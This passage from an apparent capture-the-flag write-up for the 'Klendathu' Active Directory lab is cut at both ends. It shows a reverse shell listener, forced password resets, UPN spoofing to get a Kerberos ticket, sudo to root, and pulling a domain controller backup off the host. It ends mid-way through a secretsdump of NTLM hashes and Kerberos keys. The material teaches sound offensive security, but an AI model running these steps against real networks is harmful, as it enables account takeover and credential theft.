class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu nc -nvlp 4444</span><br><span class="line">Listening on 0.0.0.0 4444</span><br><span class="line">Connection received on 10.10.137.38 54749</span><br><span class="line">Microsoft Windows [Version 10.0.20348.2402]</span><br><span class="line">(c) Microsoft Corporation. All rights reserved.</span><br><span class="line"></span><br><span class="line">C:\Users\RASCZAK\Documents&gt;<span class="built_in">cd</span> ..</span><br><span class="line"><span class="built_in">cd</span> ..</span><br><span class="line"></span><br><span class="line">C:\Users\RASCZAK&gt;<span class="built_in">cd</span> ..</span><br><span class="line"><span class="built_in">cd</span> ..</span><br><span class="line"></span><br><span class="line">C:\Users&gt;<span class="built_in">dir</span></span><br><span class="line"><span class="built_in">dir</span></span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number is A401-AF84</span><br><span class="line"></span><br><span class="line"> Directory of C:\Users</span><br><span class="line"></span><br><span class="line">04/10/2024  11:33 PM    &lt;DIR&gt;          .</span><br><span class="line">04/10/2024  06:52 PM    &lt;DIR&gt;          Administrator</span><br><span class="line">04/10/2024  07:33 PM    &lt;DIR&gt;          administrator.KLENDATHU</span><br><span class="line">04/10/2024  06:52 PM    &lt;DIR&gt;          Public</span><br><span class="line">04/10/2024  11:33 PM    &lt;DIR&gt;          RASCZAK</span><br><span class="line">               0 File(s)              0 bytes</span><br><span class="line">               5 Dir(s)   9,346,695,168 bytes free</span><br><span class="line"></span><br><span class="line">C:\Users&gt;<span class="built_in">cd</span> administrator.KLENDATHU</span><br><span class="line"><span class="built_in">cd</span> administrator.KLENDATHU</span><br><span class="line"></span><br><span class="line">C:\Users\administrator.KLENDATHU&gt;<span class="built_in">cd</span> Desktop</span><br><span class="line"><span class="built_in">cd</span> Desktop</span><br><span class="line"></span><br><span class="line">C:\Users\administrator.KLENDATHU\Desktop&gt;<span class="built_in">dir</span></span><br><span class="line"><span class="built_in">dir</span></span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number is A401-AF84</span><br><span class="line"></span><br><span class="line"> Directory of C:\Users\administrator.KLENDATHU\Desktop</span><br><span class="line"></span><br><span class="line">04/10/2024  07:33 PM    &lt;DIR&gt;          .</span><br><span class="line">04/10/2024  07:33 PM    &lt;DIR&gt;          ..</span><br><span class="line">               0 File(s)              0 bytes</span><br><span class="line">               2 Dir(s)   9,346,691,072 bytes free</span><br><span class="line"></span><br><span class="line">C:\Users\administrator.KLENDATHU\Desktop&gt;<span class="built_in">cd</span> ../..</span><br><span class="line"><span class="built_in">cd</span> ../..</span><br><span class="line"></span><br><span class="line">C:\Users&gt;<span class="built_in">cd</span> Administrator</span><br><span class="line"><span class="built_in">cd</span> Administrator</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator&gt;<span class="built_in">cd</span> Desktop</span><br><span class="line"><span class="built_in">cd</span> Desktop</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator\Desktop&gt;<span class="built_in">dir</span></span><br><span class="line"><span class="built_in">dir</span></span><br><span class="line"> Volume <span class="keyword">in</span> drive C has no label.</span><br><span class="line"> Volume Serial Number is A401-AF84</span><br><span class="line"></span><br><span class="line"> Directory of C:\Users\Administrator\Desktop</span><br><span class="line"></span><br><span class="line">04/20/2024  07:50 AM    &lt;DIR&gt;          .</span><br><span class="line">04/10/2024  06:52 PM    &lt;DIR&gt;          ..</span><br><span class="line">04/20/2024  07:50 AM                36 flag.txt</span><br><span class="line">               1 File(s)             36 bytes</span><br><span class="line">               2 Dir(s)   9,346,691,072 bytes free</span><br><span class="line"></span><br><span class="line">C:\Users\Administrator\Desktop&gt;<span class="built_in">cd</span> ../Documents</span><br><span class="line">C:\Users\Administrator\Documents&gt;</span><br></pre></td></tr></table></figure></div><p>After checking bloodhound data we can see that, user <code>RASCZAK</code> we can change password of 2 users named <code>RICO</code> and <code>IBANEZ</code><br><img                       lazyload                     src="/images/loading.svg"                     data-src="/assets/Klendathu/BH-klendathu.png"                                     ></p><p>I used net rpc command to change password of users <code>RICO</code> and <code>IBANEZ</code></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu net rpc password <span class="string">&quot;IBANEZ&quot;</span> <span class="string">&quot;MyP@ssword4323!&quot;</span> -U <span class="string">&quot;DC1.KLENDATHU.VL&quot;</span>/<span class="string">&quot;RASCZAK&quot;</span>%<span class="string">&quot;starship99&quot;</span> -S 10.10.239.165</span><br><span class="line">➜  klendathu net rpc password <span class="string">&quot;RICO&quot;</span> <span class="string">&quot;MyP@ssword4323!&quot;</span> -U <span class="string">&quot;DC1.KLENDATHU.VL&quot;</span>/<span class="string">&quot;RASCZAK&quot;</span>%<span class="string">&quot;starship99&quot;</span> -S 10.10.239.165</span><br></pre></td></tr></table></figure></div><p>After checking with netexec we we able to see we successfully changed password of <code>RICO</code> and <code>IBANEZ</code></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu nxc smb 10.10.239.165 -u users.txt -p pass.txt --continue-on-success </span><br><span class="line">SMB         10.10.239.165   445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:KLENDATHU.VL) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.10.239.165   445    DC1              [+] KLENDATHU.VL\zim:[...]</span><br><span class="line">SMB         10.10.239.165   445    DC1              [-] KLENDATHU.VL\RASCZAK:[...] STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.10.239.165   445    DC1              [-] KLENDATHU.VL\RICO:[...] STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.10.239.165   445    DC1              [-] KLENDATHU.VL\IBANEZ:[...] STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.10.239.165   445    DC1              [+] KLENDATHU.VL\RASCZAK:[...] </span><br><span class="line">SMB         10.10.239.165   445    DC1              [-] KLENDATHU.VL\RICO:[...] STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.10.239.165   445    DC1              [-] KLENDATHU.VL\IBANEZ:[...] STATUS_LOGON_FAILURE </span><br><span class="line">SMB         10.10.239.165   445    DC1              [+] KLENDATHU.VL\RICO:MyP@ssword4323!</span><br><span class="line">SMB         10.10.239.165   445    DC1              [+] KLENDATHU.VL\IBANEZ:MyP@ssword4323!</span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/assets/Klendathu/BH-klendathu-2.png"                                     ></p><p>Ceri Coburn from Pen Test Partners highlighted a misconfiguration in the Kerberos authentication mechanism on Linux servers joined to Active Directory. When NT_ENTERPRISE (name-type, enterprise) is used, having GenericWrite on a domain user allows modification of the userPrincipalName (UPN) attribute. This misconfiguration enables an attacker to spoof domain users by editing the UPN. To exploit this, you can identify a target user—say, one in the LINUX_ADMINS group (members: flores and leivy)—and modify their UPN using ldapmodify with an LDIF file. <a class="link"   href="https://www.pentestpartners.com/security-blog/a-broken-marriage-abusing-mixed-vendor-kerberos-stacks/" >Abusing mixed vendor Kerberos stacks<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p><p>I used <code>ldapmodify</code> to modify <code>userPrincpalName</code> <a class="link"   href="https://www.digitalocean.com/community/tutorials/how-to-use-ldif-files-to-make-changes-to-an-openldap-system" >How To Use LDIF Files to Make Changes to an OpenLDAP System<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu <span class="built_in">cat</span> edit-add-data.ldif </span><br><span class="line">dn: cn=rico,cn=<span class="built_in">users</span>,dc=klendathu,dc=vl</span><br><span class="line">changetype: modify</span><br><span class="line">replace: userPrincipalName</span><br><span class="line">userPrincipalName: flores</span><br><span class="line">➜  klendathu ldapmodify -H ldap://DC1.KLENDATHU.VL -a -x -D <span class="string">&quot;CN=RASCZAK,CN=USERS,DC=KLENDATHU,DC=VL&quot;</span> -W -f ./edit-add-data.ldif</span><br><span class="line">Enter LDAP Password: </span><br><span class="line">modifying entry <span class="string">&quot;cn=rico,cn=users,dc=klendathu,dc=vl&quot;</span></span><br><span class="line">➜  klendathu </span><br></pre></td></tr></table></figure></div><p><strong>We generated a Ticket Granting Ticket (TGT) for flores</strong>, used <code>getTGT.py</code> to generate a TGT for the user <code>flores</code> with NT_ENTERPRISE principal.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">➜  klendathu getTGT.py KLENDATHU.VL/flores:<span class="string">&#x27;newP@ssword2024&#x27;</span> -principal NT_ENTERPRISE</span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Saving ticket <span class="keyword">in</span> flores.ccache</span><br><span class="line">➜  klendathu <span class="built_in">export</span> KRB5CCNAME=flores.ccache </span><br><span class="line">➜  klendathu ssh -K flores@klendathu.vl@srv2.klendathu.vl</span><br><span class="line">Last login: Thu Oct 17 23:50:04 2024 from 10.8.3.249</span><br><span class="line">[flores@KLENDATHU.VL@srv2 ~]$ <span class="built_in">ls</span></span><br><span class="line">[flores@KLENDATHU.VL@srv2 ~]$ <span class="built_in">ls</span> -la</span><br><span class="line">total 12</span><br><span class="line">drwx------. 2 flores@KLENDATHU.VL domain <span class="built_in">users</span>@KLENDATHU.VL  83 Apr 11  2024 .</span><br><span class="line">drwxr-xr-x. 6 root                root                      118 Apr 11  2024 ..</span><br><span class="line">lrwxrwxrwx. 1 root                root                        9 Apr 11  2024 .bash_history -&gt; /dev/null</span><br><span class="line">-rw-------. 1 flores@KLENDATHU.VL domain <span class="built_in">users</span>@KLENDATHU.VL  18 Apr 10  2024 .bash_logout</span><br><span class="line">-rw-------. 1 flores@KLENDATHU.VL domain <span class="built_in">users</span>@KLENDATHU.VL 141 Apr 10  2024 .bash_profile</span><br><span class="line">-rw-------. 1 flores@KLENDATHU.VL domain <span class="built_in">users</span>@KLENDATHU.VL 492 Apr 10  2024 .bashrc</span><br><span class="line">[flores@KLENDATHU.VL@srv2 ~]$ </span><br></pre></td></tr></table></figure></div><p>After checking sudo Permissions by running <code>sudo -l</code> the output shows flores has <code>(ALL : ALL) NOPASSWD: ALL</code>, allowing root access without a password.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">[flores@KLENDATHU.VL@srv2 ~]$ <span class="built_in">sudo</span> -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> flores@KLENDATHU.VL on srv2:</span><br><span class="line">    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep=<span class="string">&quot;COLORS DISPLAY</span></span><br><span class="line"><span class="string">    HOSTNAME HISTSIZE KDEDIR LS_COLORS&quot;</span>, env_keep+=<span class="string">&quot;MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE&quot;</span>,</span><br><span class="line">    env_keep+=<span class="string">&quot;LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES&quot;</span>, env_keep+=<span class="string">&quot;LC_MONETARY LC_NAME LC_NUMERIC</span></span><br><span class="line"><span class="string">    LC_PAPER LC_TELEPHONE&quot;</span>, env_keep+=<span class="string">&quot;LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY&quot;</span>,</span><br><span class="line">    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin</span><br><span class="line"></span><br><span class="line">User flores@KLENDATHU.VL may run the following commands on srv2:</span><br><span class="line">    (ALL : ALL) NOPASSWD: ALL</span><br><span class="line">[flores@KLENDATHU.VL@srv2 ~]$ <span class="built_in">sudo</span> su </span><br><span class="line">[root@srv2 flores@KLENDATHU.VL]# <span class="built_in">ls</span></span><br><span class="line">[root@srv2 flores@KLENDATHU.VL]# <span class="built_in">cd</span></span><br><span class="line">[root@srv2 ~]# <span class="built_in">ls</span></span><br><span class="line">anaconda-ks.cfg  flag.txt  inc5543_domaincontroller_backup</span><br><span class="line">[root@srv2 ~]# zip file.zip -r inc5543_domaincontroller_backup/</span><br><span class="line">  adding: inc5543_domaincontroller_backup/ (stored 0%)</span><br><span class="line">  adding: inc5543_domaincontroller_backup/Active Directory/ (stored 0%)</span><br><span class="line">  adding: inc5543_domaincontroller_backup/Active Directory/ntds.dit (deflated 94%)</span><br><span class="line">  adding: inc5543_domaincontroller_backup/Active Directory/ntds.jfm (deflated 98%)</span><br><span class="line">  adding: inc5543_domaincontroller_backup/registry/ (stored 0%)</span><br><span class="line">  adding: inc5543_domaincontroller_backup/registry/SECURITY (deflated 87%)</span><br><span class="line">  adding: inc5543_domaincontroller_backup/registry/SYSTEM (deflated 82%)</span><br><span class="line">  adding: inc5543_domaincontroller_backup/note.txt (deflated 15%)</span><br><span class="line">[root@srv2 ~]# <span class="built_in">cp</span> file.zip /tmp</span><br><span class="line">[root@srv2 ~]# <span class="built_in">cd</span> /tmp</span><br><span class="line"></span><br></pre></td></tr></table></figure></div><p>After accessing the target system, we located a ZIP file containing a backup <code>inc5543_domaincontroller_backup</code> of the domain controller. We copied this file to our machine for further analysis.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">➜  srv2 wget http://10.10.239.167:2233/anaconda-ks.cfg        </span><br><span class="line">--2024-10-17 23:59:36--  http://10.10.239.167:2233/anaconda-ks.cfg</span><br><span class="line">Connecting to 10.10.239.167:2233... connected.</span><br><span class="line">HTTP request sent, awaiting response... 200 OK</span><br><span class="line">Length: 962 [application/octet-stream]</span><br><span class="line">Saving to: ‘anaconda-ks.cfg’</span><br><span class="line">anaconda-ks.cfg              100%[==============================================&gt;]     962  --.-KB/s    <span class="keyword">in</span> 0s      </span><br><span class="line">2024-10-17 23:59:36 (14.1 MB/s) - ‘anaconda-ks.cfg’ saved [962/962]</span><br><span class="line">➜  srv2 wget http://10.10.239.167:2233/file.zip       </span><br><span class="line">--2024-10-18 00:00:51--  http://10.10.239.167:2233/file.zip</span><br><span class="line">Connecting to 10.10.239.167:2233... connected.</span><br><span class="line">HTTP request sent, awaiting response... 200 OK</span><br><span class="line">Length: 4879517 (4.7M) [application/zip]</span><br><span class="line">Saving to: ‘file.zip’</span><br><span class="line">file.zip                     100%[==============================================&gt;]   4.65M   568KB/s    <span class="keyword">in</span> 12s     </span><br><span class="line">2024-10-18 00:01:02 (414 KB/s) - ‘file.zip’ saved [4879517/4879517]</span><br><span class="line">➜  srv2 </span><br></pre></td></tr></table></figure></div><h2 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h2><p>After unziping file.zip from our machine we got some sam and ntds dump.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br></pre></td><td class="code"><pre><span class="line">➜  inc5543_domaincontroller_backup secretsdump.py -system registry/SYSTEM -security registry/SECURITY -ntds Active\ Directory/ntds.dit <span class="built_in">local</span></span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Target system bootKey: 0x1aac51d09fa5f94bc600de7a569de30f</span><br><span class="line">[*] Dumping cached domain logon information (domain/username:<span class="built_in">hash</span>)</span><br><span class="line">[*] Dumping LSA Secrets</span><br><span class="line">[*] <span class="variable">$MACHINE</span>.ACC </span><br><span class="line"><span class="variable">$MACHINE</span>.ACC:plain_password_hex:c35d988d7dfaa866781c0b32a7808e0dd54c1c28166a73c3d924745c09320ccec6825c178a6c2e004a978a1fa5c720636de89c15e27e2f4352b9bdf135ace35a01af7b690cea53202f650a3a249a961437cc7936b0a9901eaea035966fb11da05ae3b6fba7e1d105c227fc240d49cb35e0bd5b811807a9f0c28be33aecb161757bb0df793b6edd7371dc1862f3f303738cc25d8e54b7ad89a6a9b3de7d5afb4430086e0123baebe18a5f5b5eabfe39516d9f9fac24aa5ce00ec9737f3c2197f6a09fce26deba29bc08544636e81bba1c21808126d2348a1e12622331e6bd52fde350dc2351a30938768ede177af93765</span><br><span class="line"><span class="variable">$MACHINE</span>.ACC: aad3b435b51404eeaad3b435b51404ee:8fd76de52edad3a3248716157d761af2</span><br><span class="line">[*] DPAPI_SYSTEM </span><br><span class="line">dpapi_machinekey:0xe9cd8353c1ae32ee02e03e0970c370ceaea38de0</span><br><span class="line">dpapi_userkey:0xc9ed57029e33120c4d012f7b9a30c5d23ed030c1</span><br><span class="line">[*] NL<span class="variable">$KM</span> </span><br><span class="line"> 0000   61 19 6A 7C 13 1D 30 6B  C2 79 22 C5 5B 37 2F 48   a.j|..0k.y<span class="string">&quot;.[7/H</span></span><br><span class="line"><span class="string"> 0010   4B AE F2 B0 FC E1 60 E8  C0 FE BE 39 23 B8 79 87   K.....`....9#.y.</span></span><br><span class="line"><span class="string"> 0020   04 17 2E 70 C3 F6 CF 1A  91 3B 88 5A 18 89 E3 76   ...p.....;.Z...v</span></span><br><span class="line"><span class="string"> 0030   B2 85 4D 1E 98 20 D9 54  D3 5A 60 DA 94 79 E5 4A   ..M.. .T.Z`..y.J</span></span><br><span class="line"><span class="string">NL<span class="variable">$KM</span>:61196a7c131d306bc27922c55b372f484baef2b0fce160e8c0febe3923b8798704172e70c3f6cf1a913b885a1889e376b2854d1e9820d954d35a60da9479e54a</span></span><br><span class="line"><span class="string">[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)</span></span><br><span class="line"><span class="string">[*] Searching for pekList, be patient</span></span><br><span class="line"><span class="string">[*] PEK # 0 found and decrypted: feab48d5655b005f0fed603c166c587f</span></span><br><span class="line"><span class="string">[*] Reading and decrypting hashes from Active Directory/ntds.dit </span></span><br><span class="line"><span class="string">Administrator:500:aad3b435b51404eeaad3b435b51404ee:c05b9e7dfd1fbbd1a3605b76c2f3caaa:::</span></span><br><span class="line"><span class="string">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span></span><br><span class="line"><span class="string">DC1$:1000:aad3b435b51404eeaad3b435b51404ee:8fd76de52edad3a3248716157d761af2:::</span></span><br><span class="line"><span class="string">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5ca7b7010a24c7d9ae4640c205a43770:::</span></span><br><span class="line"><span class="string">WS1$:1103:aad3b435b51404eeaad3b435b51404ee:baeeac0d852a621bbb2eb28066bd7a85:::</span></span><br><span class="line"><span class="string">SRV1$:1104:aad3b435b51404eeaad3b435b51404ee:92d2a8cdd8606a52707f5568598bf867:::</span></span><br><span class="line"><span class="string">SRV2$:1105:aad3b435b51404eeaad3b435b51404ee:bc0a47f2632d72d4bdf64da82beed5b3:::</span></span><br><span class="line"><span class="string">RICO:1109:aad3b435b51404eeaad3b435b51404ee:15c0b1fd31654e2f091ad00eed5c47e5:::</span></span><br><span class="line"><span class="string">JENKINS:1110:aad3b435b51404eeaad3b435b51404ee:155bfbc846be96bbb0ca075b8ad5c50b:::</span></span><br><span class="line"><span class="string">IBANEZ:1111:aad3b435b51404eeaad3b435b51404ee:464d407577eed01400dc085d079dfa65:::</span></span><br><span class="line"><span class="string">ZIM:1112:aad3b435b51404eeaad3b435b51404ee:6f828fcc42635f4bebaa756e1a6e4899:::</span></span><br><span class="line"><span class="string">DELADRIER:1113:aad3b435b51404eeaad3b435b51404ee:59dd694aeb6dc0d35a06ada8d8c52910:::</span></span><br><span class="line"><span class="string">ALPHARD:1114:aad3b435b51404eeaad3b435b51404ee:93524f125be72bbe2f519ff06ec84f2f:::</span></span><br><span class="line"><span class="string">LEIVY:1115:aad3b435b51404eeaad3b435b51404ee:73c0aa08b3c851188280424b7209614f:::</span></span><br><span class="line"><span class="string">FRANKEL:1116:aad3b435b51404eeaad3b435b51404ee:d620561c8b45e1ee86cd9a8c2113304b:::</span></span><br><span class="line"><span class="string">HENDRICK:1117:aad3b435b51404eeaad3b435b51404ee:09537092b842696e21368e517fc1edfa:::</span></span><br><span class="line"><span class="string">PATERSON:1118:aad3b435b51404eeaad3b435b51404ee:84d10bca899f2ee6fc809979adc925fe:::</span></span><br><span class="line"><span class="string">AZUMA:1119:aad3b435b51404eeaad3b435b51404ee:867465ecd21059cf15a8f8f3bfb75bd7:::</span></span><br><span class="line"><span class="string">CHERENKOV:1120:aad3b435b51404eeaad3b435b51404ee:9ee8dcc6fb125f708a73502e49d693e1:::</span></span><br><span class="line"><span class="string">CLEA:1121:aad3b435b51404eeaad3b435b51404ee:4e6d8605071a2e17bb9161347fb19f3c:::</span></span><br><span class="line"><span class="string">DUNN:1122:aad3b435b51404eeaad3b435b51404ee:7e30b39a4c875dae7d031fccdabd33bc:::</span></span><br><span class="line"><span class="string">FLORES:1123:aad3b435b51404eeaad3b435b51404ee:7e24ea85f52f3da326999359ff9a29db:::</span></span><br><span class="line"><span class="string">SHUJUMI:1124:aad3b435b51404eeaad3b435b51404ee:c842acb579db478e3b42fcfe8c2a0fd9:::</span></span><br><span class="line"><span class="string">BARCALOW:1126:aad3b435b51404eeaad3b435b51404ee:5a3e144b6f92aa15bb4c1cefb1a9e76f:::</span></span><br><span class="line"><span class="string">BRECKENRIDGE:1127:aad3b435b51404eeaad3b435b51404ee:a6c346c437358f68584ebc7a526f3da1:::</span></span><br><span class="line"><span class="string">BYRD:1128:aad3b435b51404eeaad3b435b51404ee:04753842b20f10ded235d00cd5a6d629:::</span></span><br><span class="line"><span class="string">MCINTHIRE:1129:aad3b435b51404eeaad3b435b51404ee:eb533b825104723b3087787c26bb3e44:::</span></span><br><span class="line"><span class="string">RASCZAK:1131:aad3b435b51404eeaad3b435b51404ee:54f74b0da1ab30641e8b03e7d9de5930:::</span></span><br><span class="line"><span class="string">svc_backup:1135:aad3b435b51404eeaad3b435b51404ee:513676c3c6855c3c189771d68720dc15:::</span></span><br><span class="line"><span class="string">[*] Kerberos keys from Active Directory/ntds.dit </span></span><br><span class="line"><span class="string">Administrator:aes256-cts-hmac-sha1-96:d739d0d6ed0aa25e209779886055e2c3167f4e3001df53c3dece0728aa373b68</span></span><br><span class="line"><span class="string">Administrator:aes128-cts-hmac-sha1-96:b94c0e701ac20478c0d2660e529dd246</span></span><br><span class="line"><span class="string">Administrator:des-cbc-md5:a71c7a15852f1604</span></span><br><span class="line"><span class="string">DC1$:aes256-cts-hmac-sha1-96:95a20b19f85cd64d2f63fc561223948bb30d4144df4b3cf221edbfb5db40db72</span></span><br><span class="line"><span class="string">DC1$:aes128-cts-hmac-sha1-96:8cc864802cd03d46bf65b34fc2103cc0</span></span><br><span class="line"><span class="string">DC1$:des-cbc-md5:868c612f80089449</span></span><br><span class="line"><span class="string">krbtgt:aes256-cts-hmac-sha1-96:d0497f208e2025dd4595d3757e9059a377a6412c6812bea12a90d350d0d1938d</span></span><br><span class="line"><span class="string">krbtgt:aes128-cts-hmac-sha1-96:90ece1bece0c1b7774e406f8617ea22c</span></span><br><span class="line"><span class="string">krbtgt:des-cbc-md5:abe5a74051f71a07</span></span><br><span class="line"><span class="string">WS1$:aes256-cts-hmac-sha1-96:ab8a3f657f3b9c74da8fe26b8237b961a05692a3594bfc4aa174b4a44c7b4749</span></span><br><span class="line"><span class="string">WS1$:aes128-cts-hmac-sha1-96:89c3c4f324550cb5527d3c5c3be58f56</span></span><br><span class="line"><span class="string">WS1$:des-cbc-md5:079be668f4daeac2</span></span><br><span class="line"><span class="string">SRV1$:aes256-cts-hmac-sha1-96:cee2e7f254bc47a3fac6e29fb61d05ddb8423a6545b1e63c52b61d8b2d4c9cd6</span></span><br><span class="line"><span class="string">SRV1$:aes128-cts-hmac-sha1-96:0044ab2f163b559e5c52604f5049b40d</span></span><br><span class="line"><span class="string">SRV1$:des-cbc-md5:2002bc929849f21a</span></span><br><span 